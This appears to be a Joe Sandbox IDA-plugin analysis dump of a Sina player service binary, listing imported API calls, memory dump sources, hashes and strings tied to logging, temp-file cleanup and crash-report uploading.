                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037AD4C
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037AD86
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037ADC0
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037ADE0
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,00000000), ref: 0037ADFD
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,00000000), ref: 0037AE20
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,00000000), ref: 0037AE31
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037AE4B
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037AE69
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037AE78
                                                                                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0037AE92
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@$V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@$?width@ios_base@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??3@?sputc@?$basic_streambuf@CountCurrentD@std@@@1@@DebugOutputStringThreadTickU?$char_traits@_V01@@W@std@@@std@@$??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@MessageOsfx@?$basic_ostream@Post
                                                                                                                                                                                                    • String ID: )#sinaclient#[$)- $SinaPlayerQuit quit sinaplayer_service$SinaPlayerQuit vec_timeout_thread_.size = $upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 3763361583-1566683569
                                                                                                                                                                                                    • Opcode ID: 39cbeb96bbbb4f41e4ce008e2d6c3202dbc47dd971ad5ae5934396c9561ecbab
                                                                                                                                                                                                    • Instruction ID: a0f7b50512453e7c459c6882cf44c6e406b41ee6f1bd1213c40270a71db5189a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39cbeb96bbbb4f41e4ce008e2d6c3202dbc47dd971ad5ae5934396c9561ecbab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3A16272900209EFDF22DFA4DD4ABDDB7B8FB14305F008599E409A7291DB759A44CF61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00391730: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000002,00000000,00000000,00000021,00000040,00000001,8285FFAB,?,?,00391DBA), ref: 003917A5
                                                                                                                                                                                                      • Part of subcall function 00391730: ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@_JH@Z.MSVCP120(00000000,00000000,00000002), ref: 003917CD
                                                                                                                                                                                                      • Part of subcall function 00391730: ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP120(?), ref: 003917E0
                                                                                                                                                                                                      • Part of subcall function 00391730: ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@_JH@Z.MSVCP120(00000000,00000000,00000000,?), ref: 00391818
                                                                                                                                                                                                      • Part of subcall function 00391730: ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PAD_J@Z.MSVCP120(00000000,?,?), ref: 00391828
                                                                                                                                                                                                      • Part of subcall function 00391730: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000002,00000000), ref: 00391852
                                                                                                                                                                                                      • Part of subcall function 00391730: ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 00391863
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000000,00000000,000000FF,00000002,Content-Type: application/octet-stream,00000028,00000000,00000000,000000FF), ref: 00391634
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120(00000000,00000000,000000FF,00000002,Content-Type: application/octet-stream,00000028,00000000,00000000,000000FF), ref: 0039166D
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,000000FF), ref: 00391679
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: D@std@@@std@@U?$char_traits@$U?$char_traits@_W@std@@@std@@$??3@?seekg@?$basic_istream@?setstate@?$basic_ios@_V12@_$??1?$basic_ios@_?read@?$basic_istream@?tellg@?$basic_istream@H@2@Unlock@?$basic_streambuf@V12@V?$fpos@
                                                                                                                                                                                                    • String ID: "$"$"; filename="$--$Content-Disposition: form-data; name="$Content-Type: application/octet-stream
                                                                                                                                                                                                    • API String ID: 2397676173-1198882228
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB,00000000), ref: 00378341
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 00378364
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037839E
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 003783D8
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 003783F5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00378412
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,00000000), ref: 00378435
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,00000000), ref: 00378446
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00378460
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037847E
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037848D
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 003784DE
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 003784EA
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 003784F3
                                                                                                                                                                                                    • ?DeleteFileW@base@@YA_NABVFilePath@1@_N@Z.BASE(00000054,00000001), ref: 0037852F
                                                                                                                                                                                                    • ?DeleteFileW@base@@YA_NABVFilePath@1@_N@Z.BASE(000000A8,00000000), ref: 0037853A
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 00378542
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00378562
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 00378577
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00378592
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 003785AA
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003785C7
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 003785E5
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00378602
                                                                                                                                                                                                    • ?clear@FilePath@base@@QAEXXZ.BASE(?), ref: 00378644
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$File$V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@Path@base@@V01@$??6?$basic_ostream@?width@ios_base@std@@Unlock@?$basic_streambuf@$?sputc@?$basic_streambuf@DeletePath@1@_U?$char_traits@_W@base@@W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??3@?clear@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCurrentD@std@@@1@@DebugOsfx@?$basic_ostream@OutputStringThreadTickV01@@
                                                                                                                                                                                                    • String ID: )#sinaclient#[$)- $CleanTempFiles$upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 3701126544-2824641664
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(003AC14C), ref: 0038C682
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0038C6A6
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0038C6C7
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0038C701
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0038C745
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0038C765
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0038C782
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0038C7A5
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0038C7B6
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0038C7D0
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0038C7E1
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 0038C7E9
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0038C807
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038C816
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0038C864
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0038C870
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0038C879
                                                                                                                                                                                                    • ?GetVlogLevelHelper@logging@@YAHPBDI@Z.BASE(breakpad\tools\crash_service.cc,00000020), ref: 0038C886
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(breakpad\tools\crash_service.cc,00000140,000000FF), ref: 0038C8A6
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,00000000), ref: 0038C8CE
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE ref: 0038C8E6
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 0038C8F3
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(003AC14C), ref: 0038C910
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@$V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@$?width@ios_base@std@@$Interlocked$?sputc@?$basic_streambuf@IncrementMessage@logging@@U?$char_traits@_W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??3@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCurrentD@std@@@1@@DebugDecrementHelper@logging@@LevelOsfx@?$basic_ostream@OutputStringThreadTickV01@@Vlog
                                                                                                                                                                                                    • String ID: crash_cnt_before_upgrade_ = $)#sinaclient#[$)- $breakpad\tools\crash_service.cc$client end. pid = $Vll
                                                                                                                                                                                                    • API String ID: 3965199131-2379291016
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 0037C13D
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037C160
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037C19A
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037C1DD
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037C1FD
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037C21A
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0037C23D
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037C24E
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_N@Z.MSVCP120 ref: 0037C268
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z.MSVCP120 ref: 0037C279
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 0037C281
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037C29F
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037C2AE
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037C2FF
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037C30B
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037C317
                                                                                                                                                                                                    • ?FromSeconds@TimeDelta@base@@SA?AV12@_J@Z.BASE(?,?,?,?,Function_0000B110,00000000,?,?), ref: 0037C3B5
                                                                                                                                                                                                    • ?GetProgramCounter@tracked_objects@@YAPBXXZ.BASE ref: 0037C3C9
                                                                                                                                                                                                    • ??0Location@tracked_objects@@QAE@PBD0HPBX@Z.BASE(UploadMgr::StatComplete,upload_mgr.cpp,00000121,00000000), ref: 0037C3E2
                                                                                                                                                                                                    • ?PostDelayedTask@MessageLoop@base@@QAEXABVLocation@tracked_objects@@ABV?$Callback@$$A6AXXZ@2@VTimeDelta@2@@Z.BASE(00000001,00000000,?,00000000), ref: 0037C408
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE ref: 0037C418
                                                                                                                                                                                                      • Part of subcall function 0037DA80: ??3@YAXPAX@Z.MSVCR120(?), ref: 0037DCC2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                     • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                     • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
